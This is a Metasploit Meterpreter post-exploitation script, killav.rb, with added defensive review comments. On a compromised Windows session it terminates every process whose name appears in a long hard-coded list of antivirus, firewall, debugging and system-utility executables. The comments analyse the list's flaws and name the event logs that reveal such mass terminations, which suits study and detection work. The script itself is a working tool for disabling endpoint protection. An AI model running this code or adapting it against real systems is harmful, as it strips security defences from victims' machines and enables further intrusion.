
killav.rb 8.8KB

  ##
  # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  # If you'd like to improve this script, please try to port it as a post
  # module instead. Thank you.
  ##
  #
  # Meterpreter script that kills all Antivirus processes
  # Provided by: Jerome Athias <jerome.athias [at] free.fr>
  #
  # Option table for this script. The only switch defined is -h; the leading
  # `false` marks it as taking no argument value.
  # NOTE(review): this is a class variable assigned at script top level; both
  # `usage` and the parse call in this file read it, so the name must stay as is.
  @@exec_opts = Rex::Parser::Arguments.new('-h' => [false, 'Help menu.'])
  # Prints the option summary built from @@exec_opts and then ends the script
  # by raising Rex::Script::Completed, so nothing after the call site runs.
  def usage
    banner = "Usage:" + @@exec_opts.usage
    print_line(banner)
    raise Rex::Script::Completed
  end
  # Parse the script arguments. -h is the only recognised switch; it prints the
  # usage text, and `usage` raises, so the script stops before touching any
  # process. Any other invocation falls through to the kill loop below with no
  # confirmation step and no dry-run mode.
  @@exec_opts.parse(args) do |opt, _idx, _val|
    usage if opt == "-h"
  end

  # NOTE(review): the message says "services", but the code that follows only
  # terminates processes; no service is stopped or disabled in this file.
  print_status("Killing Antivirus services on the target...")
  # Hard-coded list of process image names that the loop at the end of this
  # script matches against. Order and contents are unchanged from the original
  # (including the repeated avp.exe entry); rows are grouped by first letter
  # for readability only.
  #
  # Review notes (defensive):
  # - Despite the variable name, the list is not limited to antivirus and
  #   personal-firewall products. It also names stock Windows utilities
  #   (cmd.exe, regedit.exe, taskmgr.exe, netstat.exe, msconfig.exe),
  #   debugging and analysis tools (ollydbg.exe, procdump.exe, ethereal.exe),
  #   and what look like malware or adware image names (msblast.exe,
  #   gator.exe) - presumably inherited from an older blocklist; confirm
  #   before relying on any single entry.
  # - Many entries are Windows 9x/NT-era product names (amon9x.exe,
  #   avwin95.exe), so the list says little about current endpoint products.
  # - Because it is a static name list, it is also a ready-made watchlist:
  #   terminations of several of these images in a short window are worth
  #   alerting on.
  avs = %w[
    AAWTray.exe Ad-Aware.exe MSASCui.exe _avp32.exe _avpcc.exe _avpm.exe aAvgApi.exe
    ackwin32.exe adaware.exe advxdwin.exe agentsvr.exe agentw.exe alertsvc.exe
    alevir.exe alogserv.exe amon9x.exe anti-trojan.exe antivirus.exe ants.exe
    apimonitor.exe aplica32.exe apvxdwin.exe arr.exe atcon.exe atguard.exe
    atro55en.exe atupdater.exe atwatch.exe au.exe aupdate.exe
    auto-protect.nav80try.exe autodown.exe autotrace.exe autoupdate.exe
    avconsol.exe ave32.exe avgcc32.exe avgctrl.exe avgemc.exe avgnt.exe
    avgrsx.exe avgserv.exe avgserv9.exe avguard.exe avgw.exe avkpop.exe
    avkserv.exe avkservice.exe avkwctl9.exe avltmain.exe avnt.exe avp.exe
    avp.exe avp32.exe avpcc.exe avpdos32.exe avpm.exe avptc32.exe avpupd.exe
    avsched32.exe avsynmgr.exe avwin.exe avwin95.exe avwinnt.exe avwupd.exe
    avwupd32.exe avwupsrv.exe avxmonitor9x.exe avxmonitornt.exe avxquar.exe
    backweb.exe bargains.exe bd_professional.exe beagle.exe belt.exe bidef.exe
    bidserver.exe bipcp.exe bipcpevalsetup.exe bisp.exe blackd.exe blackice.exe
    blink.exe blss.exe bootconf.exe bootwarn.exe borg2.exe bpc.exe brasil.exe
    bs120.exe bundle.exe bvt.exe
    ccapp.exe ccevtmgr.exe ccpxysvc.exe cdp.exe cfd.exe cfgwiz.exe cfiadmin.exe
    cfiaudit.exe cfinet.exe cfinet32.exe claw95.exe claw95cf.exe clean.exe
    cleaner.exe cleaner3.exe cleanpc.exe click.exe cmd.exe cmd32.exe cmesys.exe
    cmgrdian.exe cmon016.exe connectionmonitor.exe cpd.exe cpf9x206.exe
    cpfnt206.exe ctrl.exe cv.exe cwnb181.exe cwntdwmo.exe
    datemanager.exe dcomx.exe defalert.exe defscangui.exe defwatch.exe
    deputy.exe divx.exe dllcache.exe dllreg.exe doors.exe dpf.exe dpfsetup.exe
    dpps2.exe drwatson.exe drweb32.exe drwebupw.exe dssagent.exe dvp95.exe
    dvp95_0.exe
    ecengine.exe efpeadm.exe emsw.exe ent.exe esafe.exe escanhnt.exe
    escanv95.exe espwatch.exe ethereal.exe etrustcipe.exe evpn.exe
    exantivirus-cnet.exe exe.avxw.exe expert.exe explore.exe
    f-agnt95.exe f-prot.exe f-prot95.exe f-stopw.exe fameh32.exe fast.exe
    fch32.exe fih32.exe findviru.exe firewall.exe fnrb32.exe fp-win.exe
    fp-win_trial.exe fprot.exe frw.exe fsaa.exe fsav.exe fsav32.exe
    fsav530stbyb.exe fsav530wtbyb.exe fsav95.exe fsgk32.exe fsm32.exe
    fsma32.exe fsmb32.exe
    gator.exe gbmenu.exe gbpoll.exe generics.exe gmt.exe guard.exe guarddog.exe
    hacktracersetup.exe hbinst.exe hbsrv.exe hotactio.exe hotpatch.exe
    htlog.exe htpatch.exe hwpe.exe hxdl.exe hxiul.exe
    iamapp.exe iamserv.exe iamstats.exe ibmasn.exe ibmavsp.exe icload95.exe
    icloadnt.exe icmon.exe icsupp95.exe icsuppnt.exe idle.exe iedll.exe
    iedriver.exe iexplorer.exe iface.exe ifw2000.exe inetlnfo.exe infus.exe
    infwin.exe init.exe intdel.exe intren.exe iomon98.exe istsvc.exe
    jammer.exe jdbgmrg.exe jedi.exe
    kavlite40eng.exe kavpers40eng.exe kavpf.exe kazza.exe keenvalue.exe
    kerio-pf-213-en-win.exe kerio-wrl-421-en-win.exe kerio-wrp-421-en-win.exe
    kernel32.exe killprocesssetup161.exe
    launcher.exe ldnetmon.exe ldpro.exe ldpromenu.exe ldscan.exe lnetinfo.exe
    loader.exe localnet.exe lockdown.exe lockdown2000.exe lookout.exe
    lordpe.exe lsetup.exe luall.exe luau.exe lucomserver.exe luinit.exe
    luspt.exe
    mapisvc32.exe mcagent.exe mcmnhdlr.exe mcshield.exe mctool.exe mcupdate.exe
    mcvsrte.exe mcvsshld.exe md.exe mfin32.exe mfw2en.exe mfweng3.02d30.exe
    mgavrtcl.exe mgavrte.exe mghtml.exe mgui.exe minilog.exe mmod.exe
    monitor.exe moolive.exe mostat.exe mpfagent.exe mpfservice.exe mpftray.exe
    mrflux.exe msapp.exe msbb.exe msblast.exe mscache.exe msccn32.exe
    mscman.exe msconfig.exe msdm.exe msdos.exe msiexec16.exe msinfo32.exe
    mslaugh.exe msmgt.exe msmsgri32.exe mssmmc32.exe mssys.exe msvxd.exe
    mu0311ad.exe mwatch.exe
    n32scanw.exe nav.exe navap.navapsvc.exe navapsvc.exe navapw32.exe navdx.exe
    navlu32.exe navnt.exe navstub.exe navw32.exe navwnt.exe nc2000.exe
    ncinst4.exe ndd32.exe neomonitor.exe neowatchlog.exe netarmor.exe
    netd32.exe netinfo.exe netmon.exe netscanpro.exe netspyhunter-1.2.exe
    netstat.exe netutils.exe nisserv.exe nisum.exe nmain.exe nod32.exe
    normist.exe norton_internet_secu_3.0_407.exe notstart.exe
    npf40_tw_98_nt_me_2k.exe npfmessenger.exe nprotect.exe npscheck.exe
    npssvc.exe nsched32.exe nssys32.exe nstask32.exe nsupdate.exe nt.exe
    ntrtscan.exe ntvdm.exe ntxconfig.exe nui.exe nupgrade.exe nvarch16.exe
    nvc95.exe nvsvc32.exe nwinst4.exe nwservice.exe nwtool16.exe
    ollydbg.exe onsrvr.exe optimize.exe ostronet.exe otfix.exe outpost.exe
    outpostinstall.exe outpostproinstall.exe
    padmin.exe panixk.exe patch.exe pavcl.exe pavproxy.exe pavsched.exe
    pavw.exe pccwin98.exe pcfwallicon.exe pcip10117_0.exe pcscan.exe
    pdsetup.exe periscope.exe persfw.exe perswf.exe pf2.exe pfwadmin.exe
    pgmonitr.exe pingscan.exe platin.exe pop3trap.exe poproxy.exe popscan.exe
    portdetective.exe portmonitor.exe powerscan.exe ppinupdt.exe pptbc.exe
    ppvstop.exe prizesurfer.exe prmt.exe prmvr.exe procdump.exe
    processmonitor.exe procexplorerv1.0.exe programauditor.exe proport.exe
    protectx.exe pspf.exe purge.exe
    qconsole.exe qserver.exe
    rapapp.exe rav7.exe rav7win.exe rav8win32eng.exe ray.exe rb32.exe
    rcsync.exe realmon.exe reged.exe regedit.exe regedt32.exe rescue.exe
    rescue32.exe rrguard.exe rshell.exe rtvscan.exe rtvscn95.exe rulaunch.exe
    run32dll.exe rundll.exe rundll16.exe ruxdll32.exe
    safeweb.exe sahagent.exe save.exe savenow.exe sbserv.exe sc.exe scam32.exe
    scan32.exe scan95.exe scanpm.exe scrscan.exe serv95.exe
    setup_flowprotector_us.exe setupvameeval.exe sfc.exe sgssfw32.exe sh.exe
    shellspyinstall.exe shn.exe showbehind.exe smc.exe sms.exe smss32.exe
    soap.exe sofi.exe sperm.exe spf.exe sphinx.exe spoler.exe spoolcv.exe
    spoolsv32.exe spyxx.exe srexe.exe srng.exe ss3edit.exe ssg_4104.exe
    ssgrate.exe st2.exe start.exe stcloader.exe supftrl.exe support.exe
    supporter5.exe svc.exe svchostc.exe svchosts.exe svshost.exe sweep95.exe
    sweepnet.sweepsrv.sys.swnetsup.exe symproxysvc.exe symtray.exe sysedit.exe
    system.exe system32.exe sysupd.exe
    taskmg.exe taskmgr.exe taskmo.exe taskmon.exe taumon.exe tbscan.exe tc.exe
    tca.exe tcm.exe tds-3.exe tds2-98.exe tds2-nt.exe teekids.exe tfak.exe
    tfak5.exe tgbob.exe titanin.exe titaninxp.exe tracert.exe trickler.exe
    trjscan.exe trjsetup.exe trojantrap3.exe tsadbot.exe tvmd.exe tvtmd.exe
    undoboot.exe updat.exe update.exe upgrad.exe utpost.exe
    vbcmserv.exe vbcons.exe vbust.exe vbwin9x.exe vbwinntw.exe vcsetup.exe
    vet32.exe vet95.exe vettray.exe vfsetup.exe vir-help.exe
    virusmdpersonalfirewall.exe vnlan300.exe vnpc3000.exe vpc32.exe vpc42.exe
    vpfw30s.exe vptray.exe vscan40.exe vscenu6.02d30.exe vsched.exe
    vsecomr.exe vshwin32.exe vsisetup.exe vsmain.exe vsmon.exe vsstat.exe
    vswin9xe.exe vswinntse.exe vswinperse.exe
    w32dsm89.exe w9x.exe watchdog.exe webdav.exe webscanx.exe webtrap.exe
    wfindv32.exe whoswatchingme.exe wimmun32.exe win-bugsfix.exe win32.exe
    win32us.exe winactive.exe window.exe windows.exe wininetd.exe wininitx.exe
    winlogin.exe winmain.exe winnet.exe winppr32.exe winrecon.exe winservn.exe
    winssk32.exe winstart.exe winstart001.exe wintsk32.exe winupdate.exe
    wkufind.exe wnad.exe wnt.exe wradmin.exe wrctrl.exe wsbgate.exe
    wupdater.exe wupdt.exe wyvernworksfirewall.exe
    xpf202en.exe zapro.exe zapsetup3001.exe zatutor.exe zonalm2601.exe
    zonealarm.exe
  ]
  # Walk the session's process list and terminate every process whose
  # lower-cased image name is an exact member of `avs`.
  #
  # Review notes (defensive):
  # - Matching is on the image name alone; path, signer and hash are never
  #   consulted, so any process that merely shares a listed name (cmd.exe,
  #   taskmgr.exe, ...) is terminated as well.
  # - Only the process is terminated. Nothing here stops or disables a service,
  #   so a product whose service is configured to restart can presumably come
  #   back - verify per product rather than assuming protection stays down or
  #   stays up.
  # - There is no rescue around the kill call; how a refused termination
  #   (for example by a product with self-protection) surfaces is not visible
  #   in this file.
  # - Telemetry: several security-product processes exiting within seconds is
  #   a high-signal event. Process-exit auditing (Windows Security 4689, Sysmon
  #   Event ID 5) and process-access logging (Sysmon Event ID 10) are the usual
  #   places to look for it.
  client.sys.process.get_processes.each do |proc_info|
    image_name = proc_info['name']
    next unless avs.include?(image_name.downcase)

    print_status("Killing off #{image_name}...")
    client.sys.process.kill(proc_info['pid'])
  end